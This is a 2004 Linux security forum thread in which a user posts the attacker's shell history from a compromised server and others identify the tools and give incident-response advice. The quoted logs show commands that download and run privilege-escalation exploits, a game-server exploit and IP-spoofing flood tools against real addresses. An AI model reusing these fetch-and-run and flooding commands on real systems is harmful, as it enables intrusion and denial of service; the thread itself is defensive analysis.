LinuxQuestions.org
Did you know LQ has a Linux Hardware Compatibility List?
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices

Reply
 
Search this Thread
Old 03-23-2004, 12:30 AM   #1
carrion
LQ Newbie
 
Registered: Mar 2004
Posts: 1

Rep: Reputation: 0
Hacker attack


Well, I was hacked (first time). It was totally my fault for allowing a certain user to have such a horrible password. I don't know why I allowed it, but it is now a totally randomly generated pass, so I guess hind sight and all.

I have been searching through the logs and found a series of ip address that were trying to login to FTP with anonymous, but all the ip addressed from last and from the logs dealing with login are accounted for. I can't find any sign of login from a hacker.

When he/she (hence forth it) gained access, it downloaded several files chmoded them executable and then ran them with various params. I found a .bash_history in the /tmp dir that contained the following ( i distorted the urls to get by the filter here):
Quote:
w
cd /tmp
uname -a
wget (www).irclogged.hpg.com.br/xp
wget (www).irclogged.hpg.com.br/xp
chmod +x xp
./xp
cd /tmp
ps x
wget (http)://members.lycos.co.uk/ownznow/o/po
chmod +x po
./po
./po
./po
./po
./po
rm -rf po
ls
ps x
wget (www).irclogged.hpg.com.br/p
chmod +x p
./p;
./p; ./p; ./p; ./p; ./p; ./p
ps x
kill -9 11590
kill -9 11515
ps x
ls
w
ps x
exit
cd /tmp
ls
rm -rf *
cd /var/tmp
ls
./pt
ls -a
cd ...
ls
rm -rf *
wget (www).nene.nu/f3
chmod +x f3
./f3 200.171.161.4 65335 20
./f3 200.138.145.64 65335 300
./f3 200.138.145.64 65335 30
./f3 200.138.145.64 65335 30
ls
wget (www).ircentrevistas.hpg.com.br/pass/hl
wget (www).ircentrevistas.hpg.com.br/pass/hl
chmod +x hl
./hl
./hl -h 200.171.161.4 -t 1
w
./hl -h 66.143.96.60 -t 0
./hl -h 65.16.221.235 -t 0
./hl -h 66.90.73.195 -t 0
telnet 66.90.73.195 4561
ls
./hl -h 12.15.89.7 -t 0 -p 27025
./hl -h 69.56.208.42 -t 0
./hl -h 66.235.186.52 -t 0
./hl -h 66.98.162.91 -t 0
./hl -h 65.125.234.90 -t 0
./hl -h 66.98.159.163 -t 0
./hl -h 217.160.247.138 -t 0
./hl -h 69.22.254.131 -t 0
./hl -h 65.105.124.172 -t 0
./hl -h 69.56.163.197 -t 0
./hl -h 12.96.166.226 -t 0
./hl -h 69.41.249.124 -t 0
./hl -h 69.56.128.102 -t 0
./hl -h 66.199.227.100 -t 0
./hl -h 204.157.1.63 -t 0
./hl -h 69.93.96.150 -t 0
ps x
ls
ps x
rm -rf hl
exit
cd /var/tmp/...
ls
wget (www).ircentrevistas.hpg.com.br/pass/hl
chmod +x hl
./hl -h 193.19.164.94 -t 0
rm -rf hl
exit
w
cd /var/tmp/...
w
ls
./f3 200.164.61.132 65335 600 &
ps x
killall -9 hlds
killall -9 hlds_run
ps x
killall -9 f3
ps x
./f3 200.164.61.132 01 600 &
ps x
netstat
ps x
ps x
ps x
kill -9 11796
w
ps x
exit
w
uname -a
exit
w
who
netstat
cd /var/tmp/...
ls
./f3 200.242.124.194 6667 800 &
w
w
ls
ps x
w
w
./f3 62.25.176.33 65335 300
w./f3 62.25.176.33 65335 300
./f3 62.25.214.19 65335 300
w
exit
I also looked in the .bash_history in the users home and it contained:
Quote:
unset histfile
cd /var/tmp
cd /tmp
ls -al
cd .bash_history
ls
unset histfile
cd /var/tmp
ls
mkdir .bash_histori
cd .bash_histori
ls
pwd
unset histfile
wget xmirc.host.sk/xpl.txt
ls
rm xpl.txt
ls
cd ..
ls
wget xmirc.host.sk/xpl.txt
chmod +xs xpl.txt
./xpl.txt
./xpl.txt
./xpl.txt
./xpl.txt
./xpl.txt
./xpl.txt
./xpl.txt
uname -a
host mercury.yourlasthost.com
ls
rm xpl.txt
ls -al
wget members.lycos.co.uk/spakowsk/doze4
chmod +xs doze4
./doze4
./doze4 200.227.235.196 0 200.227.235.156
./doze4 200.96.212.37 0 200.96.212.156
./doze4 200.193.210.21 0 200.193.210.156
ls
rm doze4
ls
w
finger root
cd /
w
uptime
unset histfile
exit
unset histfile
w
cd /var/tmp
ls
ls -al
cd .bash_histori
ls
cd ..
ls
wget members.lycos.co.uk/doze4
wget members.lycos.co.uk/spakowsk/doze4
chmod +xs doze4
./doze4 200.185.45.23 0 200.185.45.156
./doze4 200.218.180.23 0 200.218.180.156
./doze4 200.218.180.2 0 200.218.180.156
./doze4 200.185.6.123 0 200.185.6.156
w
cd /
exit
I found doze4, f3, and mremap_pte and removed their executable permissions, moved them and changed their owner. I didn't want to delete them until I knew what they did. This brings me to my main question, what did this hacker do? I see a lot of IRC related links, and a couple of commands for hlds (I do run game servers on this box). I don't see anything strange running, and there are no new cronjobs, so I'm not sure if it really did anything long term. It did not compromise root, so there is some good luck. I tried downloading those files on a windows box, but it is just garbled compiled code (I think) so I can't really tell what they do. Any help is appreciated.
 
Old 03-23-2004, 03:14 AM   #2
phek
Member
 
Registered: Jul 2001
Location: California, US
Distribution: Slackware
Posts: 196

Rep: Reputation: 30
well theres no real way to tell what he did without asking him, and you can't be sure he didn't compromise root (though by seeing how sloppy he's been, I would doubt you wouldn't notice). As far as what those programs do, your best bet is to run the program strings on them ( strings <filename> ) hopefully itll give you some hints as to what they are or maybe the name of them. And just because you dont see some process running doesnt mean its not actually running, they could have replaced ps with some hacked version. Your best bet is to write some sort of script/program to go through all the pid's in /proc and figure out what your machine is running from there (though thats still not a deffinite answer).
 
Old 03-23-2004, 06:55 AM   #3
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,374
Blog Entries: 54

Rep: Reputation: 2872Reputation: 2872Reputation: 2872Reputation: 2872Reputation: 2872Reputation: 2872Reputation: 2872Reputation: 2872Reputation: 2872Reputation: 2872Reputation: 2872
Well, I was hacked (first time). It was totally my fault for allowing a certain user to have such a horrible password.
Auch. Please check out the LQ FAQ: Security references under Compromise, breach of security, detection and at least check out the Intruder Detection Checklist (CERT): http://www.cert.org/tech_tips/intrud...checklist.html if you need a checklist for the procedure.

In a nutshell when a box was (suspected) compromised you need to:
- isolate it from the rest of the network,
- check users, processes and filesystem integrity (note with rootkits installed results may not indicate anything),
- drop to runlevel 1 and repeat step 2,
- power down the box, notify users, check boxen in your vincinity and decide how to handle the compromise. If you need reference for future forensics, add the HD's to another box, boot something like Knoppix, FIRE, PSK or the distro on the other box, mount the HD's readonly and "dd" the whole HD's to image. Else you're looking at the three R's: repartition, reformat, reinstall from scratch.
Please don't use backup & restore procedures unless you have external and untainted means to verify the integrity of the backup contents. Please do not backup binaries.


I don't know why I allowed it,
With all due respect (and I spose I don't have to explain your own actions to you nor do I want to sound like a teacher), but usually this is due to plain 'ol laziness. Someone needs something RSN and the admin decides it's not worth it to go tru the motions and takes a shortcut... I've seen it happen in RL too often. Best way is to make some rules and (make everyone) adhere to it.


I have been searching through the logs and found a series of ip address that were trying to login to FTP with anonymous, but all the ip addressed from last and from the logs dealing with login are accounted for. I can't find any sign of login from a hacker.
Using an exploit doesn't need the intruder to write login info, in short she just makes a vulnerable application Do Things for her.


I found doze4, f3, and mremap_pte and removed their executable permissions, moved them and changed their owner.
Excellent, I hope you made sure first you enabled verbose logging for about everything, users where denied logging in and services where shut down?


I didn't want to delete them until I knew what they did. This brings me to my main question, what did this hacker do?
As far as the binaries are concerned, "doze4" and "f3" are IP spoofing tools, "hl" is a multi-platform Halflife server exploit, "p" and "xp are kernel ptrace vulnerability exploits, and "po" is AFAIK a kernel mremap vulnerability expoit. The "mrepam_pte" probably is the plain Jane mremap Proof of Concept code for the second Linux kernel mremap vulnerability as released on Bugtraq/Full Disclosure a while ago. Without report of your Linux box SW specs and anomalies from your system/app logs there isn't much to say about the point of entry, except you hinted at FTP. Please post the servers specs. Halflife servers also had a|some vulnerability|ies patched end of last year.


I see a lot of IRC related links, and a couple of commands for hlds (I do run game servers on this box). I don't see anything strange running, and there are no new cronjobs, so I'm not sure if it really did anything long term.
See top of reply. Don't make yourself comfortable just yet.


It did not compromise root, so there is some good luck.
Yes, and pigs *can* fly :-]


I tried downloading those files on a windows box, but it is just garbled compiled code (I think) so I can't really tell what they do. Any help is appreciated.

Could start with
Code:
for i in doze4 f3 hl p po xp; do
file "${i}" 2>&1> file."${i}
strings -n 4 "${i}" 2>&1> strings."${i}
readelf -a "${i}" 2>&1> elf."${i}"
done
 
Old 04-27-2004, 08:17 AM   #4
spakowsk
LQ Newbie
 
Registered: Apr 2004
Posts: 1

Rep: Reputation: 0
doze4

eu sou o dono do ftp a qual estava o DDOS "doze4" e sei a vulnerabilidade de seu sistema. informações spakowsk@linuxmail.org respondo e-mails apenas em portugues.
 
Old 04-27-2004, 12:23 PM   #5
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,374
Blog Entries: 54

Rep: Reputation: 2872Reputation: 2872Reputation: 2872Reputation: 2872Reputation: 2872Reputation: 2872Reputation: 2872Reputation: 2872Reputation: 2872Reputation: 2872Reputation: 2872
Spakowsk, escreva por favor o inglês, obrigado.
 
Old 04-28-2004, 07:32 AM   #6
dominant
Member
 
Registered: Jan 2004
Posts: 409

Rep: Reputation: 30
Please, write in English!
 
Old 08-19-2004, 02:27 PM   #7
rash
LQ Newbie
 
Registered: Aug 2004
Location: Brazil
Distribution: Debian
Posts: 4

Rep: Reputation: 0
The bug where in the php of your site. Turn on safe_mode in your php.ini config file then restart the apache. Locate any suspicious .php files in yout web server that have functions system.. and search the string wget in yout apache logs, to finde the ip invasor.


Upgrade the version of your kernel, in som version of kernels 2.4 have one bug that allow to exploit the kernel and gain root acces. Verify the ports open on your system and if have suspicious executables in ps.

Regards.

Last edited by rash; 08-19-2004 at 02:30 PM.
 
Old 08-19-2004, 09:37 PM   #8
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 57
Quote:
Originally posted by rash
The bug where in the php of your site. Turn on safe_mode in your php.ini config file then restart the apache. Locate any suspicious .php files in yout web server that have functions system.. and search the string wget in yout apache logs, to finde the ip invasor.


Upgrade the version of your kernel, in som version of kernels 2.4 have one bug that allow to exploit the kernel and gain root acces. Verify the ports open on your system and if have suspicious executables in ps.

Regards.
Could you explain how you know that a PHP bug was exploited. I don't even see a mention of PHP in any of the above posts.
 
Old 08-20-2004, 09:14 AM   #9
rash
LQ Newbie
 
Registered: Aug 2004
Location: Brazil
Distribution: Debian
Posts: 4

Rep: Reputation: 0
You passed with de same problem then me.
Im neurotic with security and my web server was mass defaced, and the trafic have upper high. with the same programs than you.
The unique breach than i have founa are in php.
Don´t worry i dont hacked you. Im helping.

Regards.
 
Old 08-20-2004, 12:49 PM   #10
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 57
with the same programs than you
The majority of those files are common cracking tools that are freely available for download from numerous places. You'll actually will find them on cracked systems quite frequently, despite being attacked by different people using different exploits to gain access. I think just finding those files on a system isn't a guarantee that it was the same crackers or was exploited the same way.

my web server was mass defaced, and the traffic have upper high
I hope that you've taken it offline, done a format and re-installed the OS.

Don´t worry i dont hacked you
Well, that's good to know
 
Old 08-23-2004, 10:44 AM   #11
rash
LQ Newbie
 
Registered: Aug 2004
Location: Brazil
Distribution: Debian
Posts: 4

Rep: Reputation: 0
Hi Cap_cavern ! hehe


Of course i do the questions you mentioned. But i follow the path of the attacker. For luck the "hacker" dont del the path was trace
And I look de programs with him put in my server include the code of some of them. Fortunnely the script kiddie put in my hands the solution
 
Old 08-23-2004, 02:03 PM   #12
slackie1000
Senior Member
 
Registered: Dec 2003
Location: Brasil
Distribution: Arch
Posts: 1,037

Rep: Reputation: 45
Re: doze4

Quote:
Originally posted by spakowsk
eu sou o dono do ftp a qual estava o DDOS "doze4" e sei a vulnerabilidade de seu sistema. informações spakowsk@linuxmail.org respondo e-mails apenas em portugues.
now from carrion post...

Quote:

wget members.lycos.co.uk/spakowsk/doze4
chmod +xs doze4
./doze4
./doze4 200.227.235.196 0 200.227.235.156
./doze4 200.96.212.37 0 200.96.212.156
./doze4 200.193.210.21 0 200.193.210.156
ls
I am not sure if there is something connected....
He says that he is the owner of doze4 ftp server and that he knows the vulnerability of carrion system...
Just to help with the language spam..
spakowsk you should not do that...

regards

slackie1000
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Apparent hacker Attack lenlutz Linux - Security 2 10-14-2005 08:10 AM
hacker attack? firestomper41 Mandriva 8 05-09-2004 04:35 PM
Hacker proof Joey.Dale Linux - General 2 08-11-2003 08:19 PM
hacker attack? zetsui Linux - General 4 08-04-2003 06:03 AM
Hacker Forums Volcom Slackware 1 05-26-2003 05:18 PM


All times are GMT -5. The time now is 03:40 AM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration